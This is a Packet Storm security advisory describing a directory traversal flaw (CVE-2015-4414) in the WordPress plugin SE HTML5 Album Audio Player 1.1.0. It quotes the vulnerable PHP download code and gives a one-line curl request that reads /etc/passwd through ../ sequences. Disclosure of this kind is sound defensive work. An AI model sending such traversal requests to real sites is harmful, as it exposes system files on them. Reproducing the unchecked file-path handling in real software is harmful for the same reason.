exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal

WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal
Posted Jun 11, 2015
Authored by Larry W. Cashdollar

WordPress SE HTML5 Album Audio Player plugin version 1.1.0 suffers from a traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2015-4414
SHA-256 | 81424b362836e1f87647f0d8767db8affccfc69ef41a140b10eb979f0ded8ac7

WordPress SE HTML5 Album Audio Player 1.1.0 Directory Traversal

Change Mirror Download
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.

This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13 case 'pdf': $mime = 'application/pdf'; break;
14 case 'zip': $mime = 'application/zip'; break;
15 case 'jpeg':
16 case 'jpg': $mime = 'image/jpg'; break;
17 default: $mime = 'application/force-download';
18 }
19 header('Pragma: public'); // required
20 header('Expires: 0'); // no cache
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23 header('Cache-Control: private',false);
24 header('Content-Type: '.$mime);
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26 header('Content-Transfer-Encoding: binary');
27 header('Content-Length: '.filesize($file_name)); // provide file size
28 header('Connection: close');
29 readfile($file_name); // push it out
30 exit();

The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.

CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close